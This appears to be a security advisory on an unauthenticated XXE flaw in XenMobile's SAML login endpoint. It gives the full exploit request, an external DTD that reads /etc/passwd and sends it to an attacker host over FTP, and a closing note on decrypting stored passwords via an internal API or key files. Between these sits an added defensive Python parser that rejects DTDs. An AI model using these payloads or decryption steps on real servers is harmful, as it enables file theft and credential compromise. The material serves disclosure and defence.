It is possible to read most of the files on XenMobile servers, and to make network calls to private services from them, without authenticating, by exploiting XML External Entity (XXE) processing in the service's SAML login functionality.
Submit the following request to the API:
POST /aw/saml/signin/test HTTP/1.1
Host: xenmobile.example.com
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://xenmobile.example.com/index_uc.html
X-Requested-With: XMLHttpRequest
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 8748

SAMLRequest=[long string of base64 encoded gzipped data]
The start of the base64 string decodes to:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE saml2p:Response [
<!ENTITY % remote SYSTEM "http://attackerip/attack.xml">
%remote;
]>
This references a remote file (attack.xml) on a server controlled by the attacker, with the following contents:
<!ENTITY % payload SYSTEM "file:///etc/passwd">
<!ENTITY % param1 '<!ENTITY % external SYSTEM "ftp://attackerip/%payload;" >'>
%param1;
%external;
This causes the server that is processing the XML to fetch the URL named in the payload entity, store the result in a parameter entity, and then make an additional request to the attacker's server with that value embedded in the URL.
The URLs can be http://, https://, file:// or ftp://. FTP URLs can contain newline characters, so this method allows us to read files on the server, or to make HTTP requests to services inside or outside the firewall, and then send the result back to an attacker. Any text file can be read as long as it does not contain a % character.
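The root cause is that the SAML endpoint hands attacker-controlled XML to a parser with DTD and external-entity processing enabled. The following is an added example, not code from the advisory or from Citrix, showing the defender's side: decode a SAMLRequest parameter the way the endpoint would (base64, optionally gzipped), refuse any message that carries a DOCTYPE or ENTITY declaration before parsing, and configure the parser so that it cannot fetch external entities even if the pre-check were bypassed. XenMobile itself is a Java application; the function names (`decode_saml_request`, `parse_saml_message`, `saml_verdict`), the hostile sample and the placeholder host `dtd-host.example` are all my own constructions.

```python
import base64
import gzip
import re
import xml.parsers.expat


class UnsafeXmlError(ValueError):
    """Raised when a SAML message carries a DTD, entity declaration or external reference."""


# A SAML message never legitimately needs a DOCTYPE or an ENTITY declaration, so the
# cheapest and most robust defence is to refuse the message before the parser sees it.
_DTD_MARKERS = re.compile(rb"<!(?:DOCTYPE|ENTITY)", re.IGNORECASE)


def decode_saml_request(b64_blob: str) -> bytes:
    """Base64-decode a SAMLRequest parameter and gunzip it if it is compressed."""
    raw = base64.b64decode(b64_blob)
    # gzip members start with the magic bytes 1f 8b; uncompressed XML starts with '<'.
    if raw[:2] == b"\x1f\x8b":
        raw = gzip.decompress(raw)
    return raw


def encode_saml_request(xml_bytes: bytes, compress: bool = True) -> str:
    """Inverse of decode_saml_request, used here only to build sample parameters."""
    payload = gzip.compress(xml_bytes) if compress else xml_bytes
    return base64.b64encode(payload).decode("ascii")


def carries_dtd(xml_bytes: bytes) -> bool:
    """Triage check usable on captured requests: any DOCTYPE/ENTITY declaration present?"""
    return _DTD_MARKERS.search(xml_bytes) is not None


def parse_saml_message(xml_bytes: bytes) -> str:
    """Parse a SAML message with DTD processing refused; returns the root element name."""
    if carries_dtd(xml_bytes):
        raise UnsafeXmlError("DOCTYPE/ENTITY declaration in SAML message")

    parser = xml.parsers.expat.ParserCreate()
    # Second line of defence inside the parser: never expand parameter entities, abort
    # on any DOCTYPE, and refuse to resolve external entity references.
    parser.SetParamEntityParsing(xml.parsers.expat.XML_PARAM_ENTITY_PARSING_NEVER)

    def refuse_doctype(name, sysid, pubid, has_internal_subset):
        raise UnsafeXmlError("DOCTYPE encountered during parse")

    def refuse_external_entity(context, base, system_id, public_id):
        return 0  # returning 0 makes expat fail the parse instead of fetching the entity

    parser.StartDoctypeDeclHandler = refuse_doctype
    parser.ExternalEntityRefHandler = refuse_external_entity

    root_name = []

    def on_start(name, attrs):
        if not root_name:
            root_name.append(name)

    parser.StartElementHandler = on_start
    parser.Parse(xml_bytes, True)
    return root_name[0]


def saml_verdict(b64_blob: str) -> str:
    """What a hardened /saml/signin handler would decide for a SAMLRequest parameter."""
    try:
        root = parse_saml_message(decode_saml_request(b64_blob))
    except UnsafeXmlError as exc:
        return f"rejected: {exc}"
    except xml.parsers.expat.ExpatError as exc:
        return f"rejected: malformed XML ({exc})"
    return f"accepted: {root}"


# Constructed samples: a minimal legitimate AuthnRequest and a message shaped like the
# hostile one above, pointing at a placeholder host rather than a real server.
BENIGN_XML = (
    b'<?xml version="1.0" encoding="UTF-8"?>'
    b'<saml2p:AuthnRequest xmlns:saml2p="urn:oasis:names:tc:SAML:2.0:protocol" '
    b'ID="_constructed-id" Version="2.0" IssueInstant="2020-01-01T00:00:00Z"/>'
)
HOSTILE_XML = (
    b'<?xml version="1.0" encoding="UTF-8"?>'
    b'<!DOCTYPE saml2p:Response [<!ENTITY % remote SYSTEM "http://dtd-host.example/attack.xml">%remote;]>'
    b'<saml2p:Response xmlns:saml2p="urn:oasis:names:tc:SAML:2.0:protocol"/>'
)

if __name__ == "__main__":
    print(saml_verdict(encode_saml_request(BENIGN_XML)))
    print(saml_verdict(encode_saml_request(HOSTILE_XML)))
</test>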
The server contains configuration files that hold encrypted passwords. There are two ways to decrypt them: either by calling the internal REST API endpoint available at http://localhost:30000/sftu/crypto/dec, or by downloading the files in /opt/sas/rt/keys and decrypting the passwords locally.